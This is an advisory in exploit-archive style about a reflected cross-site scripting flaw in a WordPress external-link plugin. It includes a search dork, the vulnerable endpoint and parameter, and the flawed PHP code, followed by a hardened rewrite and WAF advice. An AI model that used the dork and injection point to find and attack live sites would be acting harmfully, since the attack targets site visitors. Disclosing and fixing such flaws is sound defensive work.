
WordPress JS External Link Info Cross Site Scripting

Posted on 22 April 2014

#########################################
# Exploit Title : Wordpress Wp Js External link Info Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://wordpress.org
# Google Dork : inurl:wp-content/plugins/wp-js-external-link-info
# Date : 2014/4/16
# Tested on : Windows 7 , Linux
# Version : 1.21
######################
# Exploit : Cross Site Scripting
# Location : [Target]/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=[XSS]
######################
# Vulnerable Code :
# [CODE]
$url = $_GET['url'];                 // taken straight from the query string
$blog = urldecode($_GET['blog']);    // $_GET is already decoded; this decodes a second time
...
<?php echo $url; ?>                  // reflected into the page with no output encoding
<?php echo $blog; ?>                 // reflected into the page with no output encoding
# [/CODE]
#
# ### Demo
#
############################################
Discovered By : Milad Hacking
We Love Mohammad
Mail : milad.hacking.blackhat@gmail.com
Home Page : https://www.facebook.com/milad.hacking.5
############################################
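The root cause above is that both `$url` and `$blog` reach the HTML unencoded. The following is an added example of how `redirect.php` could handle the same two parameters safely; it is not the plugin's code or the advisory author's. The parameter names come from the advisory; the helper names and the choice to accept only http(s) destinations for `url` are assumptions.

```php
<?php
// Added example (not the wp-js-external-link-info plugin's own code).
// Hardened handling of the two parameters that redirect.php reflects.

// PHP already URL-decodes $_GET, so the original's extra urldecode()
// is unnecessary; read the values once and treat them as untrusted.
$url  = isset($_GET['url'])  ? (string) $_GET['url']  : '';
$blog = isset($_GET['blog']) ? (string) $_GET['blog'] : '';

// Assumed hardening: the external link must be an absolute http(s) URL.
// Anything else (javascript:, data:, relative or malformed input) is dropped.
function safe_http_url(string $candidate): string
{
    if (filter_var($candidate, FILTER_VALIDATE_URL) === false) {
        return '';
    }
    $scheme = strtolower((string) parse_url($candidate, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true) ? $candidate : '';
}

// Encode for the HTML context the value lands in. ENT_QUOTES covers both
// quote styles so the same helper is safe inside attributes and text nodes;
// the explicit charset avoids encoding mismatches.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$url = safe_http_url($url);

// The vulnerable original was simply: echo $url; echo $blog;
// Every reflection below goes through h().
?>
<p>You are leaving <?php echo h($blog); ?>.</p>
<?php if ($url !== ''): ?>
<p>Continue to
  <a href="<?php echo h($url); ?>" rel="noopener noreferrer"><?php echo h($url); ?></a>
</p>
<?php else: ?>
<p>No valid destination was supplied.</p>
<?php endif; ?>
```

Because the plugin decodes an already-decoded parameter, any request log review or WAF rule for this endpoint should normalise the `blog` value the same way (decode twice) before inspecting it, otherwise double-encoded input is not matched.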
